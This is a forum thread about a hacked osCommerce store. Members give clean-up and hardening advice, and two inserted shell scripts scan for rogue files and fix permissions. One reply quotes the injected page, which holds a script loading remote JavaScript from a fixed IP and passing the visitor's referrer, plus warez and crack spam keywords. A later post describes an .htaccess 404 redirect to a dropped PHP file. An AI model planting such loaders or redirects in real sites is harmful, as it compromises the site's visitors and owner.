
osCommerce

Site Hacked - Help!


tomknapp


I have an OsCommerce site that was hacked. I have re-uploaded a fresh copy of the website to the server but the hacked changes still show up. Can someone please check this out and give me some ideas on how to fix this? Every time you click on any of the Categories it displays some junk website on my page.

 

site: http://www.atoztheatrical.com/catalog/catalog

 

Help!

 

Thanks,

 

Tom


I have an OsCommerce site that was hacked. I have re-uploaded a fresh copy of the website to the server but the hacked changes still show up. Can someone please check this out and give me some ideas on how to fix this? Every time you click on any of the Categories it displays some junk website on my page.

 

site: http://www.atoztheatrical.com/catalog/catalog

 

Help!

 

Thanks,

 

Tom

 

I would suggest removing this from the index.php

 

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html dir="LTR" lang="en">

<head>

<html>
<head>
<title>30</title>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<META http-equiv="Content-Language" content="en-us">
<META http-equiv="no-cache">
<META name="robots" content="index,follow">
<META name="revisit" content="3 days">
<META name="Subject" Content="30, call of duty n-gage free full, cool edit pro II, crack clondvd 4322">

<META name="description" Content="30, XPlite and 2000lite v1.7 torrent, Vanilla Ninja - Cool vibes MP3 DOWNLOADS, worms 4 mayhem protection key, partyhardcore 2003, free bs nude.com, key generator de photoshop 8, 30069, litepro key, Monster Garage license code hack, REG CODE SOLID WORKS 2006">
<META name="keywords" Content="30, fifa 06 pc serial codes, total recorder 4.3 keygen download, Sony PSP Manager Serial Key, crack tangotime, pc game crack free full download pharaoh, megaupload net transport 1.94c, Serious Sam௼? cheat code, antihack free, no_cd Command and Conquer Generals Zero Hour">
<STYLE>
body td {
font: 14px Arial, Helvetica, Sans-Serif;
margin: 0px 0px 0px 0px;
vertical-align: top;
}
.data{
border-width: 1px;
border-color:grey;
width: 600px;
background-color:EEEEEE;
border-style: solid;
padding: 10px 10px
}
.sidebar{
width: 400px;
}
ul li  { 
font-size:11px; 
margin:10px 5px ;  
padding: 2px 0 0 15px; 
list-style:none;
text-align:left;
}
p {
border-bottom:1px dotted #959595; 
}
</STYLE>
</head>
<body>
<script>
document.write("\<script");
document.write(" src=\"http://66.226.75.10/?j="+escape(document.referrer)+"\"\>");
document.write("\<\/script\>");
</SCRIPT>
<CENTER>
<!-- <form><input type="hidden" name="osCsid" value="0678af12e3d31af27f18114882b0f274" /> -->
<INPUT size="41" name="q"> <INPUT type="submit" value="search">
<!-- </form> -->
<TABLE>
<tr><td>
Search history:
<div class="data"><i>Jun 19, 2008</i><p>paris hilton gratis video download software torrent, Serious Sam௼? cheat code, bittorent games download pc, keygen zone alarm pro 6, business card check virginia visa, free download prince of persia s60, 50cent litte boy, dvd region css key crack, descarga de trial bike basic, x-win32 5.11 crack serial, REG CODE SOLID WORKS 2006, crack clondvd 4322, crackz du meter, download GTA San Andreas porno</p><i>Jun 18, 2008</i><p>download digital voice editor 2, Call of Duty 2 game install crack, warez wifi key, intitle:index.of?mp3[elvis presley, kide game, nautica thorn free wallpaper, windows 2000 pro sp4 keygen serialz crack, hack subseven 2.2.0 download, babilon key activation, windvr 2 trial free download, Cd-key sim city 4 deluxe, x-win32 5.11 crack serial, medieval download total war manual</p><i>Jun 17, 2008</i><p>NOD 32 2.5 reg. key, Warcraft Dota Allstars Patch Download, bridge commander 1.3 patch no cd, 3d sex villa 2.2 crack, crack need for speed underground speed.exe, free download full version BPM studio pro, partyhardcore 2003, programas hackers para sony ericsson k750i, 646988, FREE VOICE TWEAKER, free pvplayer application for n-gage, desperado antonio banderas free mp3, cs 1.5 trainer, xdiv gratis player</p><i>Jun 16, 2008</i><p>capoeira fighter license code, download GTA San Andreas porno, ma-620 window media control driver, cs 1.6 v21 downloads, total recorder 4.3 keygen download, sims downloads mirror, total recorder 4.3 keygen download, war3x 1.20b crack, windows 2000 pro sp4 keygen serialz crack, dungeon siege 2 version 2.2 no-cd crack, PowerQuest 7.03 free, the legend of zelda full version free download, act=ST;f=6;t=77, Tibia trainers that dont need passwords, s55 com port, war3x 1.20b crack, descargar UpToDate, alkohol krak downloads, fifa 06 pc serial codes, co tafar</p><i>Jun 15, 2008</i><p>CRAKS ROME TOTAL WAR, gtaIII free keygen, patch no cd vietcong purple haze, taxi movie torrent, bittorent games 
download pc, crack need for speed underground speed.exe, nautica thorn free wallpaper, editplus cheat code, serial zend 4.0.2, cd-death counter strike 1.5 dowload, apez bot download, linking park piano keys, johan gielen free mp3 download, unlock garmin img files, oss video converter 5.1.0</p><i>Jun 14, 2008</i><p>www.kubuś, no_cd Command and Conquer Generals Zero Hour, jay-z sextape, warez craks excel, Sexy whistle wav, serial key medal of honor allied, crack alkohol 120% 1. 9. 2, download free roadrash full version game <a href="MEDAL-OF-HONOR-PACIFIC-ASSAULT-CD-CEY.html?osCsid=0678af12e3d31af27f18114882b0f274" title="MEDAL OF HONOR PACIFIC ASSAULT CD CEY">MEDAL OF HONOR PACIFIC ASSAULT CD CEY</a> sims downloads mirror, ip switch whatsup Gold 6.02 download, like to move it.avi, download free roadrash full version game, crack clondvd 4322, 6230 jar game, Fhoto shop 8.0, dame el serial del office xp</p></div>

</td>
<td class="sidebar">
<ul>
Top queries:<li>code proevolution soccer 5, sw doctor 3.0.0.288 download, free mobile media browser for nokia 6020, mp3 doctor megaupload, free diablo2 lod cd-keys, cool edit pro II, ISA 2004 LICENSE CRACK, metastock 8.0 cd check registry, descargar gratis Close Combat: First To Fight (Mac</li><li>4music multiformat 1.55 serial, cd key jewel quest, partyhardcore 2003, free mobile media browser for nokia 6020, dap premium serialz, free AABBYY Fine Reader, download Cracking tools to Crack Shareware Softwares, no_cd Command and Conquer Generals Zero Hour, jean claude borelly windows media, Yahoo! booter, free mr skin hack</li><li>Halo Keycode generators downloaden, keygen zone alarm pro 6, AVG plus Firewall 7.1.crack, Kreludan Mining Corp. cheat authorization, s55 com port, claves del juego silent hill 1, download gunbound hack program, CRAKS ROME TOTAL WAR, marilin manson torrent</li><li>jean claude borelly windows media, download gunbound hack program, XPlite and 2000lite v1.7 torrent, free full neopets computer game downloads, autoroute per 6600 tomtom patch, hunterxhunter free movie</li><li>river past video cleaner 6.12 s/n, mpeg to RM freedownload, the legend of zelda full version free download, 7732, wow cd to 1.5</li>Most wanted:<li>business card check virginia visa, DOWNLOAD Marlin Studios, download GTA San Andreas porno, descargar gratis el demo starcraft para xp, code proevolution soccer 5, registry mechanic 3.0 s/n, midtown madness download free ftp, mp3 doctor megaupload, kaht3 download free, pda crackz, alias maya 7.0 keygen.rar, halo key no</li><li>cVALKA siemens, nexus the jupiter incident cd key generators, gprs software free download, Diablo II Lord Of Destruction 1.11b Patch & NoCD Crack.zip, rpg maker xp buy, gprs software free download, free videocam series v2 cd-key and serial number, media builder 4.9.6, registration code for PC cillin 2006, gtaIII free keygen, free videocam series v2 cd-key and serial number, free mr skin hack, alkohol krak 
downloads, sim university download for free, ProEngineer CDkey</li><li>mobilphone video converter, mp3 doctor megaupload, patch no cd vietcong purple haze, MainConcept full appz, dap premium serialz, Kaspersky AntiVirus Personal Pro 5.0.390 regkey, cd key jewel quest, index of norton 2005, tutorial need for speed most wanted</li><li>oss video converter 5.1.0, downloud Diablo, NOD 32 2.5 reg. key, nod32 fre download, N.E.R.D. lap dance video uncensored, bittorent veritus</li><li>NHL2006 EA SPORTS CHEATS, freeware 3gp clips, cs 1.5 trainer, Halo Keycode generators downloaden, number serial rogue spear, n.gage music downlod, vista Windows Media Player 11 downloud, warcraft1 crack, command and conquer generals cd-key downloud, hunterxhunter free movie, parent directory sex rmvb, metastock 8.0 cd check registry, parent directory sex rmvb, quake 3 frogs bot, Roller coaster tycoon Demo hack</li><li>Advance WMA Workshop V 2.0 .3, cd-death counter strike 1.5 dowload, google earth key reg, registry mechanic 3.0 s/n, Bass Pro Fishing 2003 Keygen, autoroute per 6600 tomtom patch, free mobile media browser for nokia 6020, sco unix serial during installation, total recorder 4.3 keygen download <a href="alias-maya-7.0-keygen.rar.html?osCsid=0678af12e3d31af27f18114882b0f274" title="alias maya 7.0 keygen.rar">alias maya 7.0 keygen.rar</a> ida pro torrent disassembler, Halo Keycode generators downloaden, EMS SQL Manager 3 free registration key, cs 1.6 v21 no steam download, project 5 cakewalk serial crack, halo key no, N.E.R.D. 
lap dance video uncensored, warcraft1 crack</li><li>vypress chat v2.1 sn, Vanilla Ninja - Cool vibes MP3 DOWNLOADS, download accelerator 7.5.1.6 serial crack, first in lady life, uplink-1.31 trainer, Hide Folder Lite serial number, s55 com port, jean claude borelly windows media</li><li>oziexplorer key download, nokia 6670 freeware applications, Bass Pro Fishing 2003 Keygen, oss video converter 5.1.0, smart movie crack for nokia 6630, 3d sex villa 2.2 crack, Kaspersky AntiVirus Personal Pro 5.0.390 regkey</li></ul>

</td>
</tr>


</TABLE>
</CENTER>
</body>

 

 

Then, I would suggest changing passwords for your FTP and Host if you still have access.

 

 

Good Luck

 

 

Chris


Thanks for the post, but as I stated before I have uploaded a fresh copy of the website to the server. But that did not fix the issue. Is there someplace else that can be the issue?

Thanks


Check your /catalog/images folder and all the sub-folders.

 

My guess is you'll find a number of "rogue" PHP files you didn't put there.

 

And I'd also bet they got there because your catalog/images has 777 permissions...

:blush:

 

They should be no higher than 755.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 


  • 3 weeks later...
Thanks for the post, but as I stated before I have uploaded a fresh copy of the website to the server. But that did not fix the issue. Is there someplace else that can be the issue?

Thanks

Solution to your problem:

 

Go into your ftp and open up your .htaccess files

If you see something similar to this:

Options -MultiViews

ErrorDocument 404 //anydirectory/49740.php

Get rid of that section of code because it is loading ads and a bunch of other bullcrap from 66.226.75.10

Someone is using you to make ad revenue off your site.

 

Also remove the "######.PHP" files your .htaccess files are pointing to. In this case "49740.php".

 

I hope this helps.

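The two clean-up checks recommended in this thread, rogue PHP files under catalog/images in a 777 folder and .htaccess files that hand a 404 to a dropped script, can be run in one pass. The script below is an added example written for this thread, not code from any poster or from osCommerce; the sample tree it builds and the paths it uses are constructed assumptions, and it only reports findings so they can be reviewed before anything is deleted.

```shell
#!/bin/sh
# Added example (not from the thread): read-only triage of an osCommerce
# document root for the symptoms described in the posts above. Paths are
# assumptions; point the functions at the real catalog path on the host.

# 1. Server-side scripts under a folder that should only ever hold images.
find_rogue_php() {              # $1 = images directory
  find "$1" -type f \( -iname '*.php*' -o -iname '*.phtml' -o -iname '*.cgi' \)
}

# 2. World-writable directories or files (the 777 mistake): anything the web
#    server user can write to is a drop point for files like 49740.php.
find_world_writable() {         # $1 = document root
  find "$1" \( -type d -o -type f \) -perm -0002
}

# 3. .htaccess files that route error pages, or PHP's auto_prepend/append
#    hooks, into a script: the "ErrorDocument 404 //anydirectory/49740.php"
#    pattern quoted in the post. Legitimate rules can match too, so review.
find_htaccess_hijacks() {       # $1 = document root
  find "$1" -type f -name '.htaccess' \
    -exec grep -liE '^[[:space:]]*(ErrorDocument|php_value[[:space:]]+auto_(prepend|append)_file).*\.(php|phtml)' {} \;
}

# Constructed sample tree so the script runs offline. The "rogue" file is a
# harmless placeholder standing in for a dropped script.
make_sample_site() {
  sample_root=$(mktemp -d)
  mkdir -p "$sample_root/catalog/images/banners" "$sample_root/catalog/includes"
  printf '<?php /* legitimate store page */ ?>\n' > "$sample_root/catalog/index.php"
  printf '<?php /* constructed: stands in for a dropped file */ ?>\n' \
    > "$sample_root/catalog/images/banners/49740.php"
  printf 'Options -MultiViews\nErrorDocument 404 //anydirectory/49740.php\n' \
    > "$sample_root/catalog/.htaccess"
  printf 'Options +FollowSymLinks\n' > "$sample_root/catalog/includes/.htaccess"
  # Normalise modes regardless of umask, then reproduce the 777 images folder.
  find "$sample_root" -type d -exec chmod 755 {} \;
  find "$sample_root" -type f -exec chmod 644 {} \;
  chmod 777 "$sample_root/catalog/images"
  echo "$sample_root"
}

# Stand-alone run against the constructed tree.
site=$(make_sample_site)
echo "== scripts under images =="
find_rogue_php "$site/catalog/images"
echo "== world-writable paths =="
find_world_writable "$site/catalog"
echo "== suspicious .htaccess files =="
find_htaccess_hijacks "$site/catalog"
rm -rf "$site"
```

The output is a review list, not a delete list: ErrorDocument can legitimately name a PHP page, and an images folder on some hosts carries a vendor script or two. Anything confirmed rogue should be saved off-server for the host's abuse team before removal, since the time stamps and contents are the evidence of how it got there.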

The simple reason why osCommerce is getting hacked is: your hosting provider is not securing the server properly, as with a proper firewall all hack attempts can be prevented. As a server admin I can say that people are trying to hack osCommerce carts and are being banned automatically by the firewall on all my servers; I get the security logs about these attempts by email. :blink: :D

Please read this line: Do you want to find all the answers to your questions? Click here. As for the contribution database, it's located here!

8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself.

Before installing a contribution or editing/updating/deleting any files, do a full backup; it will save you and everyone here on the forum the time to fix your issues.

Any issues with osCommerce, I am here to help you.


  • 1 month later...

I had this problem yesterday as well. For me, the default cache directory was still being used. Try disabling cache and see if that doesn't restore the original...


Check your /catalog/images folder and all the sub-folders.

 

My guess is you'll find a number of "rogue" PHP files you didn't put there.

 

And I'd also bet they got there because your catalog/images has 777 permissions...

:blush:

 

They should be no higher than 755.

 

Just another question: the post-install notes state that admin/images/graphs should be 777. Would that affect this and make it easier to hack the site?

Just a thought.


My suggestion is: you may want to protect your admin section with a second password. For example:

When I attempt to log into my admin panel, I have to log in TO LOG IN. MEANING, I set up password protection ("for my admin folder") from inside my hosting file manager. So every time I want to edit my website from the admin area, as soon as I enter mysite.com/catalog/admin a password box appears ("before the actual login page shows up"); please note that I would not be able to log in until I enter the correct password. When the correct password is entered, I am redirected to my admin login section.

I know that this isn't the best way to protect your website, but at least it does make it harder for unauthorized people to log in or attempt to crack your password, and even if one password is cracked, the second password would hold them up until they lose interest ("at least"). As for me, I make it my business to change this second password ("at least") every week, to provide an added sense of security.

But seriously, consider re-installing your website:

1. Locate and erase all rogue files, and back up your website.

2. Erase your entire host and database.

3. Create a new host and database with new passwords.

4. Upload your website and re-install it, using your backed-up store tables so your store info remains intact.

5. Protect your admin directory with a second password ("from inside your hosting account file manager") so you have to log in twice to enter your admin section. ('Note to everyone.')

Lastly, please inspect your database tables to make sure that there are not any rogue tables existing in your database ("in case you can't locate any rogue files").


I use the login to login check too, I password protected the admin directory (after I'd renamed it as well, and changed the path in configure.php) via my cPanel.

 

I also use several contributions to keep an eye on things:

 

Security Pro

Site Monitor

IP Trap

 

are the main ones. There's also antixss (anti cross site scripting) which I haven't installed yet.


I use the login to login check too, I password protected the admin directory (after I'd renamed it as well, and changed the path in configure.php) via my cPanel.

 

I also use several contributions to keep an eye on things:

 

Security Pro

Site Monitor

IP Trap

 

are the main ones. There's also antixss (anti cross site scripting) which I haven't installed yet.

 

Hi, could you give me a pointer on how to set up log in to log in?


Hi, could you give me a pointer on how to set up log in to log in?

 

The RC versions of osCommerce contain a database driven login to the osCommerce 'admin' panel. Unfortunately these do not ring alarm bells on the server if someone uses a piece of hacker software known as a "Password Cracker", which runs random combinations of User Name and Password against the login a large number of times per second.

 

On the other hand if the folder in which the osCommerce control panel is located is Password Protected using your Web Hosting control panel (which uses .htaccess for Apache servers) the attempts to use a Password Cracker against .htaccess files will ring alarm bells on the server, and after X number of attempts the server will automatically block the ip address of the perpetrator (provided the server is set up securely).

 

On an RC version of osCommerce this requires a double login - first to get past the .htaccess password protection on the folder, and then to get past the osCommerce login. On earlier MS2 versions only the .htaccess login is required.

 

BASIC SECURITY PRECAUTIONS

 

1. FTP to your website and rename the osCommerce 'admin' folder to something unique (not admin2 or newadmin).

2. In your renamed admin/includes/configure.php file change the references to /admin/ to /new_name/

3. Using your Web Hosting control panel (not your osCommerce admin panel) use its Directory or Password Protect link to password protect the newly renamed 'admin' folder.

4. No folder should have permissions higher than 755. If your hosting requires that you use 777 (Full) permissions then find another host.

5. Almost all files should have permissions of 644 and no higher. The two configure.php files will need permissions of 644, 444 or 400 (depending on your server set up).

 

I do wish that the osCommerce Forum Administrator would do what Zen Cart successfully does - have a "Recovering From Hacks" Forum with pinned advice on what to do to recover from hacks. Users can also post if they think or know they have been hacked and receive advice from knowledgeable members or Team Members, and even have the ability to email sensitive data directly to Team Members.

 

Vger

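The five precautions above as a script, added here as an example and not Vger's or the osCommerce project's own code. It assumes a stock layout under catalog/, a constructed admin/includes/configure.php that carries the real DIR_WS_ADMIN and DIR_FS_ADMIN constants, a hypothetical new admin name k7q2ctrl, and an 8-character minimum for that name; the .htpasswd path is a placeholder, and that file itself would be created with Apache's htpasswd tool or the hosting control panel's Password Protect link.

```shell
#!/bin/sh
# Added example (not from the thread or from osCommerce): steps 1-5 of the
# post above applied to a store tree, with a check for the half-done rename
# that leaves the old /admin/ path in configure.php.

# Step 1 guard: the rename only helps if the name is not guessable, so
# reject anything containing "admin" (admin2, newadmin) or shorter than 8
# characters (the length floor is an assumption of this example).
check_admin_name() {
  case "$1" in
    *[Aa][Dd][Mm][Ii][Nn]*) return 1 ;;
  esac
  [ "${#1}" -ge 8 ]
}

# Steps 1 and 2: move the folder, then rewrite the /old/ path segment in the
# renamed folder's configure.php (DIR_WS_ADMIN and DIR_FS_ADMIN both carry it).
rename_admin() {                  # $1 catalog root, $2 current name, $3 new name
  check_admin_name "$3" || { echo "refusing weak admin name: $3" >&2; return 1; }
  mv "$1/$2" "$1/$3"
  cfg="$1/$3/includes/configure.php"
  sed "s#/$2/#/$3/#g" "$cfg" > "$cfg.tmp" && mv "$cfg.tmp" "$cfg"
}

# Verification for step 2: a surviving reference to the old path means the
# login form posts to /old/login.php and the server answers 404.
check_configure_refs() {          # $1 configure.php, $2 old name, $3 new name
  if grep -q "/$2/" "$1"; then
    echo "old admin path /$2/ still referenced in $1" >&2
    return 1
  fi
  grep -q "DIR_WS_ADMIN.*/$3/" "$1"
}

# Step 3: the .htaccess a control panel's "Password Protect Directory" writes.
# The .htpasswd is created separately (htpasswd -c /path/.htpasswd user) and
# kept outside the document root so it is never served.
protect_admin_dir() {             # $1 admin dir, $2 absolute path of .htpasswd
  cat > "$1/.htaccess" <<EOF
AuthType Basic
AuthName "Store administration"
AuthUserFile $2
Require valid-user
EOF
}

# Steps 4 and 5: folders 755, files 644, configure.php read-only (444).
fix_perms() {                     # $1 root
  find "$1" -type d -exec chmod 755 {} \;
  find "$1" -type f -exec chmod 644 {} \;
  find "$1" -type f -name configure.php -exec chmod 444 {} \;
}

# Lists anything still deviating from that policy (empty output = clean).
report_bad_perms() {              # $1 root
  find "$1" -type d ! -perm 755
  find "$1" -type f ! -name configure.php ! -perm 644
  find "$1" -type f -name configure.php ! -perm 444 ! -perm 400 ! -perm 644
}

# Constructed sample store so the script runs offline.
make_sample_store() {
  store_root=$(mktemp -d)
  mkdir -p "$store_root/catalog/admin/includes" "$store_root/catalog/images"
  cat > "$store_root/catalog/admin/includes/configure.php" <<'EOF'
<?php
// constructed fragment in the shape of admin/includes/configure.php
define('HTTP_SERVER', 'http://www.example.com');
define('DIR_WS_ADMIN', '/catalog/admin/');
define('DIR_FS_ADMIN', '/home/store/public_html/catalog/admin/');
define('DIR_WS_CATALOG', '/catalog/');
EOF
  chmod 777 "$store_root/catalog/images"     # deliberate violation of step 4
  echo "$store_root"
}

# Stand-alone run on the constructed store.
store=$(make_sample_store)
rename_admin "$store/catalog" admin k7q2ctrl
check_configure_refs "$store/catalog/k7q2ctrl/includes/configure.php" admin k7q2ctrl \
  && echo "configure.php now points at /k7q2ctrl/"
protect_admin_dir "$store/catalog/k7q2ctrl" "$store/.htpasswd"
fix_perms "$store/catalog"
echo "== permission deviations after fix (expect none) =="
report_bad_perms "$store/catalog"
rm -rf "$store"
```

Run report_bad_perms before fix_perms on a real host to see what the installer or the host left wrong; an empty report afterwards is the target. If the host's PHP runs as a different user from the FTP account, a 644 configure.php may need to be 444 or 400 as the post says, which is why the report accepts all three.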

The RC versions of osCommerce contain a database driven login to the osCommerce 'admin' panel. Unfortunately these do not ring alarm bells on the server if someone uses a piece of hacker software known as a "Password Cracker", which runs random combinations of User Name and Password against the login a large number of times per second.

 

On the other hand if the folder in which the osCommerce control panel is located is Password Protected using your Web Hosting control panel (which uses .htaccess for Apache servers) the attempts to use a Password Cracker against .htaccess files will ring alarm bells on the server, and after X number of attempts the server will automatically block the ip address of the perpetrator (provided the server is set up securely).

 

On an RC version of osCommerce this requires a double login - first to get past the .htaccess password protection on the folder, and then to get past the osCommerce login. On earlier MS2 versions only the .htaccess login is required.

 

BASIC SECURITY PRECAUTIONS

 

1. FTP to your website and rename the osCommerce 'admin' folder to something unique (not admin2 or newadmin).

2. In your renamed admin/includes/configure.php file change the references to /admin/ to /new_name/

3. Using your Web Hosting control panel (not your osCommerce admin panel) use its Directory or Password Protect link to password protect the newly renamed 'admin' folder.

4. No folder should have permissions higher than 755. If your hosting requires that you use 777 (Full) permissions then find another host.

5. Almost all files should have permissions of 644 and no higher. The two configure.php files will need permissions of 644, 444 or 400 (depending on your server set up).

 

I do wish that the osCommerce Forum Administrator would do what Zen Cart successfully does - have a "Recovering From Hacks" Forum with pinned advice on what to do to recover from hacks. Users can also post if they think or know they have been hacked and receive advice from knowledgeable members or Team Members, and even have the ability to email sensitive data directly to Team Members.

 

Vger

 

Thanks so much, I managed to do that (complete osc noob) at least my site is a little better protected.

 

Do you have any other security "must do's" following a standard osc install?

 

:D


The RC versions of osCommerce contain a database driven login to the osCommerce 'admin' panel. Unfortunately these do not ring alarm bells on the server if someone uses a piece of hacker software known as a "Password Cracker", which runs random combinations of User Name and Password against the login a large number of times per second.

 

On the other hand if the folder in which the osCommerce control panel is located is Password Protected using your Web Hosting control panel (which uses .htaccess for Apache servers) the attempts to use a Password Cracker against .htaccess files will ring alarm bells on the server, and after X number of attempts the server will automatically block the ip address of the perpetrator (provided the server is set up securely).

 

On an RC version of osCommerce this requires a double login - first to get past the .htaccess password protection on the folder, and then to get past the osCommerce login. On earlier MS2 versions only the .htaccess login is required.

 

BASIC SECURITY PRECAUTIONS

 

1. FTP to your website and rename the osCommerce 'admin' folder to something unique (not admin2 or newadmin).

2. In your renamed admin/includes/configure.php file change the references to /admin/ to /new_name/

3. Using your Web Hosting control panel (not your osCommerce admin panel) use its Directory or Password Protect link to password protect the newly renamed 'admin' folder.

4. No folder should have permissions higher than 755. If your hosting requires that you use 777 (Full) permissions then find another host.

5. Almost all files should have permissions of 644 and no higher. The two configure.php files will need permissions of 644, 444 or 400 (depending on your server set up).

 

I do wish that the osCommerce Forum Administrator would do what Zen Cart successfully does - have a "Recovering From Hacks" Forum with pinned advice on what to do to recover from hacks. Users can also post if they think or know they have been hacked and receive advice from knowledgeable members or Team Members, and even have the ability to email sensitive data directly to Team Members.

 

Vger

You make a very good point, and I seriously agree with you, Vger, on your advice. There couldn't be enough ways to protect your investments, and creating a forum board to address such issues would be a wonderful idea. In that way, not only will people be able to post topics and get help quickly, but other osC users can also learn from the mistakes of others by the same token.

Hacking, cracking and hijacking is a problem that can never be resolved, but at least such resources and info sharing (on the users' end) would be a very good way to counter these problems (at least).

I seriously think that such a forum would help out the entire community. And I (too) hope that the forum administrators take Vger's advice into consideration.


Hi, could you give me a pointer on how to set up log in to log in?

 

It's very simple to create a Login to Login checkpoint. All you have to do is:

1. Log in to your "hosting account" file manager ("not the osC file manager").

2. From inside your hosting file manager, highlight or tick the checkbox next to your admin directory.

3. Then click or select the permissions button and select "Password Protect Directory".

4. Select "add user" to create your directory user and password.

When you are done, you will have to log in twice to enter your admin area. It's that simple.


99.9% of hacks are not osCommerce hacks and it is naive to think they are. They are just website hacks. It does not matter if you have an HTML site or a PHP site or Zen Cart or osCommerce.

 

They are placing files in vulnerable folders (e.g. the numeric files in the hack above), editing common files such as index.html or index.php (the classic iframe hack) or adding tables to your database (the classic eBay Motors scam).

 

If they are specifically hacking osCommerce you can be sure they are either a "ha ha" hack where they hack Admin and modify your catalog or worse restore an old database, or they are serious and editing your checkout/payment modules (the classic email me the credit card details hack), which is usually an "in-house" job.

 

The osCommerce forum cannot be all things to all people. There are lots of security forums out there that address the above and I think that it is good policy for osCommerce store users to be members of them.


  • 4 months later...

Hi,

 

I changed the name of the admin folder within OSC. I did this and changed the links in the config file. I go to the new admin login page, put in my username and password, but I get the following error:

 

The requested URL /oscommerce/iadmin/login.php?action=process&osCAdminID=521be1da53d894a146dd2a27bbef6c1f was not found on this server.

 

iadmin being the OLD directory name.

 

Can you help please.


Hi,

 

I changed the name of the admin folder within OSC. I did this and changed the links in the config file. I go to the new admin login page, put in my username and password, but I get the following error:

 

The requested URL /oscommerce/iadmin/login.php?action=process&osCAdminID=521be1da53d894a146dd2a27bbef6c1f was not found on this server.

 

iadmin being the OLD directory name.

 

Can you help please.

 

Since I changed the admin folder name and changed the 2 entries in the configure.php file, how come it is still referencing "/oscommerce/iadmin/login.php" as above? (iadmin being the old admin folder name). Are there other files that I need to change?

 

Please help.
